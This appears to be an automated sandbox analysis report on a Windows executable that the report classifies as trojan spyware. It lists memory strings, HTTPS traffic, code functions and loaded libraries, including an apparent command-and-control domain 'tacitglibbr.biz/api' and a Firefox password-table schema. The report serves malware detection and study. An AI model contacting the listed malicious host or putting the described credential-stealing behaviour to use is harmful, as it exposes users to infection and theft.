              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861640861.0000000003842000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837473248.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1838884443.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1865958853.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861061599.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837946467.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1860626926.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1839293002.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1836962329.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/
              Source: X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/$
              Source: X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967856629.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1969025974.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1969538530.0000000003848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api
              Source: X2hna87N3Y.exe, 00000002.00000003.1899145307.0000000003848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api5pnX
              Source: X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1969538530.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/apiGy
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004303D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_004303D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004303D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_004303D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DB50000_2_00DB5000
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DA29F20_2_00DA29F2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8B2B80_2_00D8B2B8
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00DA0C160_2_00DA0C16
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D957900_2_00D95790
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D8FF5A0_2_00D8FF5A
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004088702_2_00408870
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042B0E32_2_0042B0E3
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004358802_2_00435880
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004228A82_2_004228A8
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0040C97B2_2_0040C97B
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00418A482_2_00418A48
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004355302_2_00435530
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0040C5932_2_0040C593
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004385B02_2_004385B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043CE102_2_0043CE10
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043C6102_2_0043C610
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004256E02_2_004256E0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004167B72_2_004167B7
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043C8402_2_0043C840
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004110732_2_00411073
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041D0002_2_0041D000
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B8002_2_0043B800
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004350002_2_00435000
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042C0242_2_0042C024
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043409C2_2_0043409C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042329A2_2_0042329A
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004360A02_2_004360A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004180B92_2_004180B9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004039402_2_00403940
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004301702_2_00430170
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004059302_2_00405930
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004091B02_2_004091B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004082402_2_00408240
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004232492_2_00423249
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004272502_2_00427250
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00434A762_2_00434A76
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0040E2012_2_0040E201
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041BA002_2_0041BA00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00438A002_2_00438A00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004192102_2_00419210
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004062202_2_00406220
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041CAC02_2_0041CAC0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004232C02_2_004232C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004042F02_2_004042F0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042329A2_2_0042329A
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00421AAD2_2_00421AAD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00436B742_2_00436B74
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043CB102_2_0043CB10
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00402B902_2_00402B90
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004213902_2_00421390
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004273962_2_00427396
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004363A02_2_004363A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041B3B22_2_0041B3B2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004154612_2_00415461
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00424C602_2_00424C60
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00404C202_2_00404C20
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042A42F2_2_0042A42F
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0040AC302_2_0040AC30
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B4D02_2_0043B4D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004284802_2_00428480
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00415C822_2_00415C82
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00416C912_2_00416C91
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004074902_2_00407490
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004164942_2_00416494
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004294A02_2_004294A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042A4BE2_2_0042A4BE
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00438D402_2_00438D40
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042A5072_2_0042A507
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042A51C2_2_0042A51C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041D5202_2_0041D520
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004275C02_2_004275C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B5C02_2_0043B5C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041E5E02_2_0041E5E0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0041A5A02_2_0041A5A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00434DA02_2_00434DA0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004095B02_2_004095B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004176782_2_00417678
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00414EC02_2_00414EC0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B6E02_2_0043B6E0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004066B02_2_004066B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0040A7402_2_0040A740
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0043B7702_2_0043B770
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00408F002_2_00408F00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_0042FF002_2_0042FF00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00402F302_2_00402F30
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_004267F92_2_004267F9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00424F902_2_00424F90
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00DB50002_2_00DB5000
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00DA29F22_2_00DA29F2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8B2B82_2_00D8B2B8
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00DA0C162_2_00DA0C16
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D957902_2_00D95790
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00D8FF5A2_2_00D8FF5A
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: String function: 00D8B7C0 appears 93 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: String function: 00408040 appears 36 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: String function: 004141E0 appears 65 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: String function: 00D93EBF appears 42 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: String function: 00D9842D appears 40 times
              Source: X2hna87N3Y.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: X2hna87N3Y.exeStatic PE information: Section: .bss ZLIB complexity 1.000329525483304
              Source: X2hna87N3Y.exeStatic PE information: Section: .bss ZLIB complexity 1.000329525483304
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00435880 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00435880
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: X2hna87N3Y.exe, 00000002.00000003.1791149801.0000000003864000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1815890661.0000000003832000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: X2hna87N3Y.exeVirustotal: Detection: 52%
              Source: X2hna87N3Y.exeReversingLabs: Detection: 50%
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile read: C:\Users\user\Desktop\X2hna87N3Y.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeProcess created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"Jump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeSection loaded: mskeyprotect.dllJump to behavior
